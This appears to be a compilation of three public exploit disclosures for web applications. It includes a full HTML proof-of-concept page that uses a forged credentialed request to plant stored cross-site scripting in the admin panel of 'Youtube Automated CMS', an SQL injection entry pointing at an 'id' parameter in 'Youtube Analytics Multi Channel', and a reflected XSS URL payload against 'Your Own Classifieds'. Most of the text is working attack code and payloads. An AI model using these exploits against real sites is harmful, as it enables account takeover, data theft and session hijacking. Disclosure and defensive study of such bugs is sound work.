CSRF Exploit Code:
<html>
<body>
<title>[Youtube Automated CMS] CSRF to Persistent XSS</title>
<script>
function submitRequest()
{
var xhr = new XMLHttpRequest();
xhr.open("POST", "http://victim.com/admin/videos.php?case=add&youtube_video_url=https://sophosnews.files.wordpress.com/2016/02/anonymous.jpg", true);
xhr.setRequestHeader("Accept", "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8");
xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
xhr.setRequestHeader("Content-Type", "multipart/form-data; boundary=---------------------------1681718590736");
xhr.withCredentials = true;
var body = "-----------------------------1681718590736\r\n" +
"Content-Disposition: form-data; name=\"title\"\r\n" +
"\r\n" +
"\"\x3e\x3cscript\x3ealert(/XSSed-By-Arbin/)\x3c/script\x3e\r\n" +
"-----------------------------1681718590736\r\n" +
"Content-Disposition: form-data; name=\"details\"\r\n" +
"\r\n" +
"\r\n" +
"-----------------------------1681718590736\r\n" +
"Content-Disposition: form-data; name=\"category_id\"\r\n" +
"\r\n" +
"1\r\n" +
"-----------------------------1681718590736\r\n" +
"Content-Disposition: form-data; name=\"thumbnail\"; filename=\"\"\r\n" +
"Content-Type: application/octet-stream\r\n" +
"\r\n" +
"\r\n" +
"-----------------------------1681718590736\r\n" +
"Content-Disposition: form-data; name=\"published\"\r\n" +
"\r\n" +
"1\r\n" +
"-----------------------------1681718590736\r\n" +
"Content-Disposition: form-data; name=\"duration\"\r\n" +
"\r\n" +
"70\r\n" +
"-----------------------------1681718590736\r\n" +
"Content-Disposition: form-data; name=\"image\"\r\n" +
"\r\n" +
"https://sophosnews.files.wordpress.com/2016/02/anonymous.jpg\r\n" +
"-----------------------------1681718590736\r\n" +
"Content-Disposition: form-data; name=\"submit\"\r\n" +
"\r\n" +
"\r\n" +
"-----------------------------1681718590736--\r\n";
var aBody = new Uint8Array(body.length);
for (var i = 0; i < aBody.length; i++)
aBody[i] = body.charCodeAt(i);
xhr.send(new Blob([aBody]));
}
</script>
<br><br><br>
<center>
<h2><font color="red">[Youtube Automated CMS] CSRF to Persistent XSS by Arbin</font></h2>
<form action="#">
<input type="button" value="Submit request" onclick="submitRequest();" />
</form>
</center>
</body>
</html>
PoC Video: https://youtu.be/cCtThSquNSk
Vendor Shouted Urgent Update:
http://wpsup.com/products/youtube-automated-cms/urgent-update-1-0-8-fix-security-bugs/
Fix/Patch: Update to latest version.
----------------------------------------------------------------------------------------------------------------------
Regards,
Arbin Godar
https://twitter.com/arbingodar
# # # # #
# Exploit Title: Youtube Analytics Multi Channel v3.0 - SQL Injection
# Google Dork: N/A
# Date: 10.02.2017
# Vendor Homepage: http://vtcreators.com/
# Software Buy: https://codecanyon.net/item/youtube-analytics-multi-channel/14720919
# Demo: http://demo.vtcreators.com/yamc/
# Version: 3.0
# Tested on: Win7 x64, Kali Linux x64
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[@]ihsan[.]net
# # # # #
# SQL Injection/Exploit :
# Login as regular user
# http://localhost/[PATH]/index.php/user_management/update?id=[SQL]
# Etc...
# # # # #
source: https://www.securityfocus.com/bid/58399/info
Your Own Classifieds is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
http://www.example.com/cat-search/for-sales-2/%22%3E%3Cimg%20src=x%20onerror=prompt%280%29;%3E